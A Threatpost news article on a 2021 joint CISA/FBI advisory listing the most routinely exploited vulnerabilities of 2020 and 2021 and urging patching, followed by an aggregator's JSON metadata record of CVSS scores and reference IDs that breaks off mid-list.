In a perfect world, CISA would laminate cards with the year’s top 30 vulnerabilities: You could whip it out and ask a business if they’ve bandaged these specific wounds before you hand over your cash.
This is not a perfect world. There are no laminated vulnerability cards.
But at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK’s National Cyber Security Center listed the vulnerabilities that were “routinely” exploited in 2020, as well as those that are most often being picked apart so far this year.
[](<https://threatpost.com/newsletter-sign/>)
The vulnerabilities – which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian – include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.
“Cyber actors continue to exploit publicly known – and often dated – software vulnerabilities against broad target sets, including public and private sector organizations worldwide,” according to the advisory. “However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.”
So far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.
All of the vulnerabilities have received patches from vendors. That doesn’t mean those patches have been applied, of course.
## Repent, O Ye Patch Sinners
According to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.
Why would they stop? As long as systems remain unpatched, it’s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.
> Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. —Advisory
In fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.
The top four:
* [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent – about one in five of the 80,000 companies affected – hadn’t patched.
* [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.
* [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.
* [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks’ BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.
The cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can’t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).
If IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.
## 2020 Top 12 Exploited Vulnerabilities
Here’s the full list of the top dozen exploited bugs from last year:
**Vendor** | **CVE** | **Type**
---|---|---
Citrix | CVE-2019-19781 | arbitrary code execution
Pulse | CVE 2019-11510 | arbitrary file reading
Fortinet | CVE 2018-13379 | path traversal
F5- Big IP | CVE 2020-5902 | remote code execution (RCE)
MobileIron | CVE 2020-15505 | RCE
Microsoft | CVE-2017-11882 | RCE
Atlassian | CVE-2019-11580 | RCE
Drupal | CVE-2018-7600 | RCE
Telerik | CVE 2019-18935 | RCE
Microsoft | CVE-2019-0604 | RCE
Microsoft | CVE-2020-0787 | elevation of privilege
Netlogon | CVE-2020-1472 | elevation of privilege
## Most Exploited So Far in 2021
CISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:
* Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).
* Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.
* Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).
* VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware’s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company’s affected system.
The advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they’re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.
## Can Security Teams Keep Up?
Rick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an “influential tool to help teams stay above water and minimize their attack surface.”
The CVEs highlighted in Wednesday’s alert “continue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,” he told Threatpost on Thursday.
Recent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?
Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it’s become ever more vital for enterprise IT security stakeholders to make “meaningful changes to their cyber hygiene efforts.” That means “prioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.”
Granted, vulnerability management is “one of the most difficult aspects of any security program,” he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. “Taking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.”
072921 15:02 UPDATE: Corrected misattribution of quotes.
Worried about where the next attack is coming from? We’ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.
{"id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "type": "threatpost", "bulletinFamily": "info", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "published": "2021-07-29T18:39:56", "modified": "2021-07-29T18:39:56", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "reporter": "Lisa Vaas", "references": ["https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/", "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "https://threatpost.com/podcast-securing-active-directory-nightmare/168203/", "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/", "https://threatpost.com/singtel-zero-day-cyberattack/163938/", "https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/", "https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/", "https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "immutableFields": [], "lastseen": "2021-07-30T09:53:38", "viewCount": 570, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:C94508071E81EBFE1BF46F3EF3E4EDD3", "0DAYDB:E60701732169ACBFC7A4C97688260000"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-201804-1", "ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388", "CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:01E8B896-C436-4B08-BB3E-E254180DC879", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:587F1997-1604-43C4-9132-E5DABAECA5C1", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:7C700F0C-8A21-44FE-87D6-4E1601FE9D24", "AKB:89F43669-0248-4FDE-BCB2-4EEFE50D3A9B", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:AF37CD6E-8730-4AEF-8679-0413B491A107", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B50A8CA6-40B8-467B-A4B8-29A68F45B8A2", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F1F3CDDE-5A72-4E56-8E80-8939F188EA99", "AKB:FF495201-9E29-4561-AE45-888E59E30E1B"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:213092", "VU:421280", "VU:490028", "VU:619785"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-0860", "CPAI-2019-1653", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2020-3458", "CPAI-2021-0099", "CPAI-2021-0100", "CPAI-2021-0107", "CPAI-2021-0376", "CPAI-2021-0877"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:B788AAE055F3DE2C255FCC0E7BE16B4B", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-11884", "CVE-2018-7600", "CVE-2019-0594", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600", "DEBIANCVE:CVE-2020-1472"]}, {"type": "dsquare", "idList": ["E-638", "E-639"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:49071", "EDB-ID:49879", "EDB-ID:49895"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "EXPLOITPACK:E563140BD918794B55F61FC55941120F"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:38D8230C58CD", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4A64830CFCDC", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:83F272F4DE8F766E35BD5943AAC47D20", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "12E44744-1AF0-523A-ACA2-593B4D33E014", "13364575-934B-5E73-AA03-AEB6910F6AD2", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "14573955-860C-5947-8F2F-86347A606742", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "18D647E9-D7D4-5591-B16C-05D007AFD726", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", 